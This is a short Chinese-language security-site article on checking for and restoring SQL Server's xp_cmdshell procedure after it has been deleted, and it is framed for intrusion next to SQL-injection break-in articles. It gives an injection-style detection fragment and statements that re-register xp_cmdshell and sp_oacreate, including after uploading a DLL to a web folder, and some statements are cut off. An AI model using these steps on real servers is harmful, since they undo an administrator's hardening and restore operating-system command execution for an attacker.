恢复xpcmdshell:xp_cmdshell的删除及恢复思路方法整理总结

文章来源:安全中国

、xp_cmdshell删除及恢复
1、判断xp_cmdshell是否存在
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = ’X’ AND name = ’xp_cmdshell’)

select count(*) from master.dbo.sysobjects where xtype=’x’ and 
返回结果为1就ok

 
2、恢复xp_cmdshell思路方法 
删除扩展存储过过程xp_cmdshell语句 
exec sp_dropextendedproc ’xp_cmdshell’ 

恢复cmdshellsql语句 
exec sp_addextendedproc xp_cmdshell ,@dllname =’xplog70.dll’ 

exec master.dbo.addextendedproc ’xp_cmdshell’,’xplog70.dll’;select count(*) from master.dbo.sysobjects where xtype=’x’ and 
返回结果为1就ok 

否则需上传c:\inetput\web\xplog70.dll后 
exec master.dbo.sp_addextendedproc ’xp_cmdshell’,’c:\inetput\web\xplog70.dll’;-- 

如果是用以下思路方法删除 
drop procedure sp_addextendedproc 
drop procedure sp_oacreate 
exec sp_dropextendedproc ’xp_cmdshell’ 

则可以用以下语句恢复 
dbcc addextendedproc ("sp_oacreate","odsole70.dll") 
dbcc addextendedproc ("xp_cmdshell","xplog70.dll") 
这样可以直接恢复不用去管sp_addextendedproc是不是存在 

上篇文章: 后门技术及rootkit工具－Knark分析及防范( 2)

下篇文章: 推荐:ASP漏洞+SQL注入入侵思路方法整理总结

延伸阅读

• 2009-9-12-- xpcmdshell:sa  无xp_cmdshell下取权限又一简单思路方法
• 2009-9-12-- 恢复xpcmdshell:xp_cmdshell的删除及恢复
• 2009-9-12-- xpcmdshell:无xp_cmdshell下取权限又一简单思路方法
• 2009-9-12-- xpcmdshell:遇到sql  server  2005  恢复xp_cmdshell的办法
• 2008-11-26-- xpcmdshell:SQLSERVER扩展存储过程XP_CMDSHELL的简单应用